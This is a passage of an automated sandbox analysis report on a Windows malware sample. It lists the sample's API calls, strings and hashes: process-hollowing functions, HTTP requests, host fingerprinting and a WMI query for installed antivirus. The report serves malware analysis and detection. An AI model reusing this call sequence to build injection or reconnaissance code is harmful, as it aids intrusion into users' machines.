                                      • GetProcAddress.KERNEL32(76E00000,02F41D88), ref: 00307DD9
                                      • GetProcAddress.KERNEL32(76E00000,02F3A230), ref: 00307DF2
                                      • GetProcAddress.KERNEL32(76E00000,02F41D40), ref: 00307E0A
                                      • GetProcAddress.KERNEL32(76E00000,02F41DB8), ref: 00307E22
                                      • GetProcAddress.KERNEL32(76E00000,02F3A090), ref: 00307E3B
                                      • GetProcAddress.KERNEL32(76E00000,02F3A5B0), ref: 00307E53
                                      • GetProcAddress.KERNEL32(76E00000,CreateProcessA), ref: 00307E6A
                                      • GetProcAddress.KERNEL32(76E00000,GetThreadContext), ref: 00307E80
                                      • GetProcAddress.KERNEL32(76E00000,ReadProcessMemory), ref: 00307E97
                                      • GetProcAddress.KERNEL32(76E00000,VirtualAllocEx), ref: 00307EAE
                                      • GetProcAddress.KERNEL32(76E00000,ResumeThread), ref: 00307EC4
                                      • GetProcAddress.KERNEL32(76E00000,WriteProcessMemory), ref: 00307EDB
                                      • GetProcAddress.KERNEL32(76E00000,SetThreadContext), ref: 00307EF2
                                      • LoadLibraryA.KERNEL32(02F41E00,003066E1,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F03
                                      • LoadLibraryA.KERNEL32(02F41DA0,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F15
                                      • LoadLibraryA.KERNEL32(02F41DD0,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F27
                                      • LoadLibraryA.KERNEL32(02F41DE8,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F38
                                      • LoadLibraryA.KERNEL32(02F41D58,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F4A
                                      • LoadLibraryA.KERNEL32(02F41D70,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F5C
                                      • LoadLibraryA.KERNEL32(02F45030,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F6D
                                      • LoadLibraryA.KERNEL32(02F44F10,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F7F
                                      • LoadLibraryA.KERNEL32(dbghelp.dll,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F8F
                                      • GetProcAddress.KERNEL32(76560000,02F3A2B0), ref: 00307FAB
                                      • GetProcAddress.KERNEL32(76560000,02F44FA0), ref: 00307FC3
                                      • GetProcAddress.KERNEL32(76560000,02F432E8), ref: 00307FDB
                                      • GetProcAddress.KERNEL32(76560000,02F44D90), ref: 00307FF4
                                      • GetProcAddress.KERNEL32(76560000,02F3A2D0), ref: 0030800C
                                      • GetProcAddress.KERNEL32(73940000,02F388F0), ref: 0030802C
                                      • GetProcAddress.KERNEL32(73940000,02F3A410), ref: 00308044
                                      • GetProcAddress.KERNEL32(73940000,02F38C10), ref: 0030805C
                                      • GetProcAddress.KERNEL32(73940000,02F44F40), ref: 00308075
                                      • GetProcAddress.KERNEL32(73940000,02F44FB8), ref: 0030808D
                                      • GetProcAddress.KERNEL32(73940000,02F3A2F0), ref: 003080A5
                                      • GetProcAddress.KERNEL32(73940000,02F3A510), ref: 003080BE
                                      • GetProcAddress.KERNEL32(73940000,02F44EF8), ref: 003080D6
                                      • GetProcAddress.KERNEL32(75450000,02F3A390), ref: 003080F2
                                      • GetProcAddress.KERNEL32(75450000,02F3A310), ref: 0030810A
                                      • GetProcAddress.KERNEL32(75450000,02F44F70), ref: 00308122
                                      • GetProcAddress.KERNEL32(75450000,02F44EC8), ref: 0030813B
                                      • GetProcAddress.KERNEL32(75450000,02F3A330), ref: 00308153
                                      • GetProcAddress.KERNEL32(77050000,02F38850), ref: 00308173
                                      • GetProcAddress.KERNEL32(77050000,02F388A0), ref: 0030818B
                                      • GetProcAddress.KERNEL32(77050000,02F44FD0), ref: 003081A3
                                      • GetProcAddress.KERNEL32(77050000,02F3A3B0), ref: 003081BC
                                      • GetProcAddress.KERNEL32(77050000,02F3A3D0), ref: 003081D4
                                      • GetProcAddress.KERNEL32(77050000,02F38918), ref: 003081EC
                                      • GetProcAddress.KERNEL32(76A70000,02F44E98), ref: 0030820C
                                      • GetProcAddress.KERNEL32(76A70000,02F3A350), ref: 00308224
                                      • GetProcAddress.KERNEL32(76A70000,02F433E8), ref: 0030823D
                                      • GetProcAddress.KERNEL32(76A70000,02F44EB0), ref: 00308255
                                      • GetProcAddress.KERNEL32(76A70000,02F44DD8), ref: 0030826D
                                      • GetProcAddress.KERNEL32(76A70000,02F3A530), ref: 00308286
                                      • GetProcAddress.KERNEL32(76A70000,02F3A490), ref: 0030829E
                                      • GetProcAddress.KERNEL32(76A70000,02F44EE0), ref: 003082B6
                                      • GetProcAddress.KERNEL32(76A70000,02F44F88), ref: 003082CF
                                      • GetProcAddress.KERNEL32(76F40000,02F3A550), ref: 003082EB
                                      • GetProcAddress.KERNEL32(76F40000,02F44E38), ref: 00308303
                                      • GetProcAddress.KERNEL32(76F40000,02F44FE8), ref: 0030831C
                                      • GetProcAddress.KERNEL32(76F40000,02F44F28), ref: 00308334
                                      • GetProcAddress.KERNEL32(76F40000,02F44F58), ref: 0030834C
                                      • GetProcAddress.KERNEL32(761C0000,02F3A3F0), ref: 00308368
                                      • GetProcAddress.KERNEL32(761C0000,02F3A4B0), ref: 00308380
                                      • GetProcAddress.KERNEL32(75540000,02F3A370), ref: 0030839C
                                      • GetProcAddress.KERNEL32(75540000,02F45060), ref: 003083B4
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A570), ref: 003083D4
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A430), ref: 003083EC
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A4D0), ref: 00308405
                                      • GetProcAddress.KERNEL32(6F4C0000,02F44DF0), ref: 0030841D
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A4F0), ref: 00308435
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A450), ref: 0030844E
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A470), ref: 00308466
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A590), ref: 0030847E
                                      • GetProcAddress.KERNEL32(6F4C0000,HttpQueryInfoA), ref: 00308495
                                      • GetProcAddress.KERNEL32(6F4C0000,InternetSetOptionA), ref: 003084AC
                                      • GetProcAddress.KERNEL32(77070000,02F44E80), ref: 003084C8
                                      • GetProcAddress.KERNEL32(77070000,02F43268), ref: 003084E0
                                      • GetProcAddress.KERNEL32(77070000,02F45000), ref: 003084F9
                                      • GetProcAddress.KERNEL32(77070000,02F45018), ref: 00308511
                                      • GetProcAddress.KERNEL32(77040000,02F3A5D0), ref: 0030852D
                                      • GetProcAddress.KERNEL32(6FE10000,02F44DA8), ref: 00308549
                                      • GetProcAddress.KERNEL32(6FE10000,02F3A5F0), ref: 00308561
                                      • GetProcAddress.KERNEL32(6FE10000,02F45048), ref: 0030857A
                                      • GetProcAddress.KERNEL32(6FE10000,02F44D78), ref: 00308592
                                      • GetProcAddress.KERNEL32(6D2C0000,SymMatchString), ref: 003085AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                      • API String ID: 2238633743-2740034357
                                      • Opcode ID: 5565bb8651eaf3213635e89cdebe0ffed362063621a4d57ac29a7185bd41f792
                                      • Instruction ID: 1bb1b3bb26aa555b8b296f9ef2268c9f418d0273583808313b6621400b3241e4
                                      • Opcode Fuzzy Hash: 5565bb8651eaf3213635e89cdebe0ffed362063621a4d57ac29a7185bd41f792
                                      • Instruction Fuzzy Hash: 166252B59012009FE725DF64ED989663BF9FFAA30130C8519E905C3364E774A84AFF11

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2014
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F201B
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2022
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2029
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2030
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002F203B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F2042
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2052
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2059
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2060
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2067
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F206E
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2079
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2080
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2087
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F208E
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2095
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20AB
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20B2
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20B9
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20C0
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20C7
                                      • lstrlen.KERNEL32(?), ref: 002F20CF
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20F0
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20F7
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20FE
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2105
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F210C
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F211C
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2123
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F212A
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2131
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2138
                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 002F214D
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2158
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F215F
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2166
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F216D
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2174
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtual
                                      • String ID: In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention
                                      • API String ID: 2533436356-3600131318
                                      • Opcode ID: 7f2a42b5e8aa1455389344b04b50b2cf69102ef28f09cebb12c08146a31bf16c
                                      • Instruction ID: aace9e9488e672e10066e1e7ff2c193d8743fc39750bdc194dd6febb08a88961
                                      • Opcode Fuzzy Hash: 7f2a42b5e8aa1455389344b04b50b2cf69102ef28f09cebb12c08146a31bf16c
                                      • Instruction Fuzzy Hash: 1231A999F4032CF786DE6BB94C46DDE6E75FF8DB50B004656F52855180C9E056C0CEA3

                                      Control-flow Graph

                                      • Control-flow graph figure (blocks 3076e0-307a39; legend: Executed / Not Executed): the entry block reads the PEB (GetPEB), then resolves imports through 20 GetProcAddress calls, 5 LoadLibraryA calls and further conditional GetProcAddress calls; the edge list of the rendered graph is omitted.
                                      APIs
                                      • GetProcAddress.KERNEL32(76E00000,02F404B8), ref: 00307748
                                      • GetProcAddress.KERNEL32(76E00000,02F402C0), ref: 00307761
                                      • GetProcAddress.KERNEL32(76E00000,02F402D8), ref: 00307779
                                      • GetProcAddress.KERNEL32(76E00000,02F403E0), ref: 00307791
                                      • GetProcAddress.KERNEL32(76E00000,02F3B368), ref: 003077AA
                                      • GetProcAddress.KERNEL32(76E00000,02F39F50), ref: 003077C2
                                      • GetProcAddress.KERNEL32(76E00000,02F3A0B0), ref: 003077DA
                                      • GetProcAddress.KERNEL32(76E00000,02F404D0), ref: 003077F3
                                      • GetProcAddress.KERNEL32(76E00000,02F40500), ref: 0030780B
                                      • GetProcAddress.KERNEL32(76E00000,02F40578), ref: 00307823
                                      • GetProcAddress.KERNEL32(76E00000,02F40410), ref: 0030783C
                                      • GetProcAddress.KERNEL32(76E00000,02F3A110), ref: 00307854
                                      • GetProcAddress.KERNEL32(76E00000,02F40518), ref: 0030786C
                                      • GetProcAddress.KERNEL32(76E00000,02F40530), ref: 00307885
                                      • GetProcAddress.KERNEL32(76E00000,02F39EB0), ref: 0030789D
                                      • GetProcAddress.KERNEL32(76E00000,02F40590), ref: 003078B5
                                      • GetProcAddress.KERNEL32(76E00000,02F40308), ref: 003078CE
                                      • GetProcAddress.KERNEL32(76E00000,02F3A050), ref: 003078E6
                                      • GetProcAddress.KERNEL32(76E00000,02F40548), ref: 003078FE
                                      • GetProcAddress.KERNEL32(76E00000,02F39F70), ref: 00307917
                                      • LoadLibraryA.KERNEL32(02F40428), ref: 00307928
                                      • LoadLibraryA.KERNEL32(02F402A8), ref: 0030793A
                                      • LoadLibraryA.KERNEL32(02F402F0), ref: 0030794C
                                      • LoadLibraryA.KERNEL32(02F40620), ref: 0030795D
                                      • LoadLibraryA.KERNEL32(02F40668), ref: 0030796F
                                      • GetProcAddress.KERNEL32(76F40000,02F405F0), ref: 0030798B
                                      • GetProcAddress.KERNEL32(76560000,02F405A8), ref: 003079A7
                                      • GetProcAddress.KERNEL32(76560000,02F405C0), ref: 003079BF
                                      • GetProcAddress.KERNEL32(76A70000,02F40638), ref: 003079DB
                                      • GetProcAddress.KERNEL32(761C0000,02F39ED0), ref: 003079F7
                                      • GetProcAddress.KERNEL32(77320000,02F3B2E8), ref: 00307A13
                                      • GetProcAddress.KERNEL32(77320000,02F388C8), ref: 00307A2B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID:
                                      • API String ID: 2238633743-0
                                      • Opcode ID: 4e698fb258e79632b5a02c40b7c7fff47aa69bc259489189b6f9fc8292a11371
                                      • Instruction ID: a7f03e365414d975e8d594f190c4b0aa893b1dca17446210dde54bc697d92266
                                      • Opcode Fuzzy Hash: 4e698fb258e79632b5a02c40b7c7fff47aa69bc259489189b6f9fc8292a11371
                                      • Instruction Fuzzy Hash: B4A199B59012009FE725DF64ED989663BF9FFAA30070D8519E809C3364E774A90EFB11

                                      Control-flow Graph

                                      • Control-flow graph figure (blocks 30bd50-30c56b; legend: Executed / Not Executed): the function calls lstrcpy, lstrlen, lstrcat, GetDesktopWindow, GetTickCount, srand, rand, CloseHandle and memcpy; the edge list of the rendered graph is omitted.
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: /$UT
                                      • API String ID: 0-1626504983
                                      • Opcode ID: 780225dac62c92a4d1047f2c7775830bd3efa98cf24e26eedb492cc975f8eddb
                                      • Instruction ID: 3dfd76d34abb15f68d1284825d3101811ad4302a191fe5e3dec9499360a637d6
                                      • Opcode Fuzzy Hash: 780225dac62c92a4d1047f2c7775830bd3efa98cf24e26eedb492cc975f8eddb
                                      • Instruction Fuzzy Hash: AE421571A113598FCB26CF69DC903EEBBB5FF59300F1581AAE84897381D7749A84CB90

                                      Control-flow Graph (graph rendering omitted; basic blocks 2f5010-2f51f3 with executed / not executed marking, calling the WinINet functions listed under APIs below)
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5062
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F507A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F50A2
                                      • HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F50DC
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F5100
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F510F
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002F512E
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F5177
                                      • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 002F51C5
                                      • InternetCloseHandle.WININET(00000000), ref: 002F51D0
                                      • InternetCloseHandle.WININET(?), ref: 002F51DA
                                      • InternetCloseHandle.WININET(00000000), ref: 002F51E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$FileOpenReadRequestlstrcpy$ConnectCrackInfoOptionQuerySendlstrlen
                                      • String ID: ERROR$GET
                                      • API String ID: 1863336362-3591763792
                                      • Opcode ID: 747abad4cb3dc3d0ded44f63785aba51d6d8c1ee134d850492022992bdd55756
                                      • Instruction ID: cb05a0886ca97a0e7ab76c3f288fca1a059c7b3eed4cb93a728a76734757e090
                                      • Opcode Fuzzy Hash: 747abad4cb3dc3d0ded44f63785aba51d6d8c1ee134d850492022992bdd55756
                                      • Instruction Fuzzy Hash: F151C272A106196BEB20DB60CD46FFEB778EF54B40F144128FB05A72C1DB70AA05CBA5
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030043C
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00300475
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003004BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003004C6
                                      • wsprintfA.USER32 ref: 003004F9
                                      • lstrcat.KERNEL32(00000000,003138B4), ref: 00300508
                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 00300515
                                      • lstrlen.KERNEL32(00000000,Unknown), ref: 0030053E
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00300568
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcat$AllocateCurrentDirectoryInformationProcessProfileVolumeWindowslstrlenwsprintf
                                      • String ID: :\$C$Unknown
                                      • API String ID: 2887641034-3557680648
                                      • Opcode ID: dd92e1c4f50a3c2e589cbb6b07227fd5f6e1480f8cc1159332f1e7011ee61b8e
                                      • Instruction ID: cdd63347a4131f9b937e4d75b1ca53bef2873dd16ffb63aaafcf3660ed0557f9
                                      • Opcode Fuzzy Hash: dd92e1c4f50a3c2e589cbb6b07227fd5f6e1480f8cc1159332f1e7011ee61b8e
                                      • Instruction Fuzzy Hash: 0141E171A1121CABEB15EBA4DD16FEEB77CAF15740F044164F609B7281EB705A04CBA2
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000), ref: 00300928
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00300939
                                      • CoCreateInstance.COMBASE(003149C0,00000000,00000001,003148F0,?), ref: 00300953
                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0030098C
                                      • VariantInit.OLEAUT32(?), ref: 003009E3
                                        • Part of subcall function 00300CF0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00300A09,?), ref: 00300CF8
                                        • Part of subcall function 00300CF0: CharToOemW.USER32(?,00000000), ref: 00300D05
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • VariantClear.OLEAUT32(?), ref: 00300A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                      • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                      • API String ID: 685420537-2561087649
                                      • Opcode ID: 95d0fe9bf3cf3acebe285d93a7aa7789aeab024a5a90146c6dfc7c47ba54c8a7
                                      • Instruction ID: 1046a30708bacd9825b417773caf8fb86f565ca17277848208f4e8df55dde9ec
                                      • Opcode Fuzzy Hash: 95d0fe9bf3cf3acebe285d93a7aa7789aeab024a5a90146c6dfc7c47ba54c8a7
                                      • Instruction Fuzzy Hash: 3E417D71A41229BBCB19DB99DC45EDFBBBCEF4DB60F108215F515A7280C774AA00CBA0
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,003101E9), ref: 002FFC4D
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 002FFC5F
                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002FFC69
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002FFC93
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • LocalFree.KERNEL32(00000000), ref: 002FFD16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                      • String ID: /
                                      • API String ID: 507856799-4001269591
                                      • Opcode ID: 478c341d04fa2f0a2e7c7348ce31d3fabd2334611b9cd834c83f1cf3aed09083
                                      • Instruction ID: a6a9095f9e7ce7f250e507c277f0b4ba6f045c80528599fea4d75a4e8c42612f
                                      • Opcode Fuzzy Hash: 478c341d04fa2f0a2e7c7348ce31d3fabd2334611b9cd834c83f1cf3aed09083
                                      • Instruction Fuzzy Hash: FD21A27152021DBBEB54EBA0DD95EFEB77CEF88780F404134FA0596180DB709955CBA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFBD1
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFBD8
                                      • GetTimeZoneInformation.KERNEL32(?), ref: 002FFBE7
                                      • wsprintfA.USER32 ref: 002FFC12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID: wwww
                                      • API String ID: 3317088062-671953474
                                      • Opcode ID: 55f00571921764719af5855400606f84d4f61b147230f520fc7534fc8cdb197d
